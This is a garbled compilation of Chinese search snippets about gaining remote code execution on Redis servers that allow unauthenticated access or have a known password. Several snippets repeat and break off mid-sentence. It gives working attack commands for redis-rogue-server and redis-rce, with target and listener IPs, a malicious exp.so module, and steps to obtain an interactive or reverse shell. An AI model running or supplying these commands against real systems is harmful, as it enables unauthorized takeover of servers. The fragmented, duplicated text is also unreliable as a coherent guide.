python3 redis-rogue-server.py --server-only 参数说明: --server-only仅启动redis rogue server, 接受目标redis的连接,不主动发起连接 本项目为n0b0dyCN同名项目的fork, 在原项目代码基础之上修复了一些bug, 添加了一些新功能, 并针对不同漏洞利用场景做了一些优化。
内网Redis未授权访问/已知Redis口令, Redis需要反向连接redis rogue server 这种情况下可以使用--server-only选项 python3 redis-rogue-server.py --server-only 参数说明: --server-only仅启动redis rogue server, 接受目标redis的连接,不主动发起连接 本项目为n0b0dyCN同名项目的fork, 在原项目代码基础之上修复了...
redis-rogue-server工具下载地址:https://github.com/n0b0dyCN/redis-rogue-server 该工具无法对Redis密码进行Redis认证,也就是说该工具只适合目标存在Redis未授权访问漏洞时使用。如果存在密码可以使用下面这个工具。 Awsome-Redis-Rogue-Server工具下载地址:https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server...
#Redis-rogue-server工具下载地址:https://github.com/n0b0dyCN/redis-rogue-server # 可指定Redis密码 可以先看使用方法: highlighter- vim python3redis-rogue-server.py-h 拿着工具直接打,然后拿到shell: shell python3 redis-rogue-server.py --rhost 192.168.40.148 --lhost 192.168.40.146 --lport 1234...
redis-rogue-server工具下载地址:https://github.com/n0b0dyCN/redis-rogue-server 该工具无法对Redis密码进行Redis认证,也就是说该工具只适合目标存在Redis未授权访问漏洞时使用。如果存在密码可以使用下面这个工具。 Awsome-Redis-Rogue-Server工具下载地址:https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server...
下载地址:https://github.com/Ridter/redis-rce 这个工具里少一个exp.so的文件,我们还需要去上面那个到 redis-rogue-server 工具中找到exp.so文件并复制到redis-rce.py同一目录下,然后执行如下命令即可: python3 redis-rce.py -r rhost -lhost lhost -f exp.so -a password ...
第一步:下载wget yum -y install wget 第二步:下载redis wget http://download.redis.io/redis-stable.tar.gz 第三步:解压redis tar -zxvf redis-stable.tar.gz 第四步:解压后需要编译 make make报错:make MALLOC=libc make distclean 第五步:进入src目录,将redis-server复制到/usr/bin目录下(这样启动redi...
下载地址:https://github.com/Ridter/redis-rce 可以看到该工具有一个-a选项,可以用来进行Redis认证。 但是这个工具里少一个exp.so的文件,我们还需要去上面那个到redis-rogue-server(https://github.com/n0b0dyCN/redis-rogue-server)工具中找到exp.so文件并复制到redis-rce.py同一目录下,然后执行如下命令即可...
首先下载恶意代码。 下载地址:n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE (github.com) 可以下载下来本地编译,也可以使用作者编译好的exp.so 有两种模式,一种是交互式shell,一种是反弹shell python3 ./redis-rogue-server.py --rhost 192.168.200.38 --lhost 192.168.200.4 --exp ./exp.so ...
下载地址:https://github.com/Ridter/redis-rce 可以看到该工具有一个-a选项,可以用来进行Redis认证。 但是这个工具里少一个exp.so的文件,我们还需要去上面那个到redis-rogue-server工具中找到exp.so文件并复制到redis-rce.py同一目录下,然后执行如下命令即可: ...